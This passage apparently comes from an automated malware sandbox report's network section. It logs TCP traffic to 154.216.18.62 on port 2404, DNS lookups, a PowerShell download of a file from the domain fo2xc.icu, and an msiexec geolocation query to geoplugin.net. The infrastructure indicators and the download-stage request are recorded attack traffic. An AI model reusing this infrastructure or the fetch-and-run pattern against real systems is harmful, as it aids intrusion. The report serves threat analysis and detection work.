                                                                              Dec 31, 2024 09:28:59.968116999 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968131065 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968151093 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968162060 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968170881 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968187094 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968194962 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968214989 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968226910 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968238115 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968249083 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968260050 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968280077 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968297005 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968313932 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968324900 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968343973 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968358040 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968367100 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968375921 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968393087 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968405008 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968417883 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968451023 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968472958 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968483925 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968496084 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968504906 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968540907 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968549967 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968560934 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968570948 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968583107 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968611002 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968621016 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968628883 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968652010 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968677044 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968686104 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968697071 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968734026 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968739986 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968750954 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968760967 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968774080 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968789101 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968807936 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968835115 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968846083 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968858004 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968868971 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968879938 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968890905 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968913078 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968924999 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968935966 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968946934 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.968967915 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.968991995 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969043970 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969054937 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969069004 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969085932 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969095945 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969114065 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969121933 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969130993 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969142914 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969155073 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969167948 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969192028 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969208956 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969219923 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969230890 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969243050 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969254017 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969273090 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969297886 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969364882 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969376087 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969386101 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969399929 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969405890 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969415903 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969425917 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969434977 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969453096 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969461918 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969647884 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969664097 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969676018 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969683886 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969693899 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969710112 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969718933 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969727039 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969736099 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969748020 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969759941 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969767094 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969778061 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969789028 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969799042 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969809055 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969821930 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969830036 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969841003 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969852924 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969863892 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969872952 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969891071 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969899893 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969907999 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969922066 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969928026 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969938040 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969959974 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.969986916 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.969996929 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970006943 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970016956 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970024109 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970042944 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970184088 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970195055 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970206022 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970216036 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970227957 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970235109 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970247030 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970252991 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970263004 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970271111 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970299959 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970489979 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970541000 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970552921 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970578909 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970585108 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970594883 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970607042 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970614910 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970642090 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970664978 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970675945 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970685959 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970700026 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970707893 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970726013 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970733881 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970742941 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970753908 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970766068 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970784903 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970810890 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.970837116 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970849037 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:28:59.970900059 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:28:59.971692085 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.054718018 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054742098 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054754019 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054764986 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054799080 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.054812908 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054841995 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054847956 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.054860115 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054871082 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054881096 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.054913044 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.054934025 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054945946 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054966927 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.054977894 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.054987907 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055000067 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055012941 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055022955 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055042028 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055063963 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055079937 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055098057 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055114031 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055120945 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055133104 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055144072 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055176020 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055186033 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055195093 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055206060 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055218935 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055241108 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055247068 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055259943 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055272102 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055294037 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055305004 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055327892 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055355072 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055367947 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055380106 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055387974 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055416107 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055423021 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055439949 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055450916 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055464029 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055474997 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055485964 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055500984 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055538893 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055555105 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055583954 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055605888 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055618048 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055628061 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055641890 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055651903 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055670023 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055677891 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055687904 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055701017 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055722952 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055728912 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055737972 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055747032 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055759907 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055774927 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055788994 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055794954 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055804968 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055811882 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055821896 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055843115 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055850029 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055862904 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055877924 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055896044 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:00.055902958 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.055913925 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:00.190635920 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:02.994546890 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:02.999511003 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999526978 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999550104 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999560118 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999587059 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:02.999615908 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:02.999643087 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999653101 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999672890 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999682903 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999703884 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:02.999713898 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.004513025 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.004528999 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.004589081 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.004663944 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.004674911 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.004709959 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.004719019 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.114415884 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:03.119446993 CET240449942154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:03.120028973 CET499422404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:17.382488012 CET240449932154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:17.383809090 CET499322404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:17.388655901 CET240449932154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:47.382644892 CET240449932154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:29:47.384201050 CET499322404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:29:47.389014959 CET240449932154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:30:17.390429020 CET240449932154.216.18.62192.168.2.5
                                                                              Dec 31, 2024 09:30:17.391720057 CET499322404192.168.2.5154.216.18.62
                                                                              Dec 31, 2024 09:30:17.396595001 CET240449932154.216.18.62192.168.2.5
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 31, 2024 09:28:15.258555889 CET5059453192.168.2.51.1.1.1
                                                                              Dec 31, 2024 09:28:15.284034014 CET53505941.1.1.1192.168.2.5
                                                                              Dec 31, 2024 09:28:58.229774952 CET5364653192.168.2.51.1.1.1
                                                                              Dec 31, 2024 09:28:58.237545013 CET53536461.1.1.1192.168.2.5
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 31, 2024 09:28:15.258555889 CET192.168.2.51.1.1.10xb108Standard query (0)fo2xc.icuA (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 09:28:58.229774952 CET192.168.2.51.1.1.10xb2c0Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 31, 2024 09:28:15.284034014 CET1.1.1.1192.168.2.50xb108No error (0)fo2xc.icu172.67.136.42A (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 09:28:15.284034014 CET1.1.1.1192.168.2.50xb108No error (0)fo2xc.icu104.21.62.131A (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 09:28:58.237545013 CET1.1.1.1192.168.2.50xb2c0No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                              • fo2xc.icu
                                                                              • geoplugin.net
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549943178.237.33.50803136C:\Windows\SysWOW64\msiexec.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 31, 2024 09:28:58.246994972 CET71OUTGET /json.gp HTTP/1.1
                                                                              Host: geoplugin.net
                                                                              Cache-Control: no-cache
                                                                              Dec 31, 2024 09:28:58.847700119 CET1171INHTTP/1.1 200 OK
                                                                              date: Tue, 31 Dec 2024 08:28:58 GMT
                                                                              server: Apache
                                                                              content-length: 963
                                                                              content-type: application/json; charset=utf-8
                                                                              cache-control: public, max-age=300
                                                                              access-control-allow-origin: *
                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                              Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549713172.67.136.424431076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-31 08:28:15 UTC175OUTGET /yAvXCrQD/Mestrende.toc HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                              Host: fo2xc.icu
                                                                              Connection: Keep-Alive
                                                                              2024-12-31 08:28:16 UTC791INHTTP/1.1 200 OK
                                                                              Date: Tue, 31 Dec 2024 08:28:16 GMT
                                                                              Content-Type: application/octet-stream
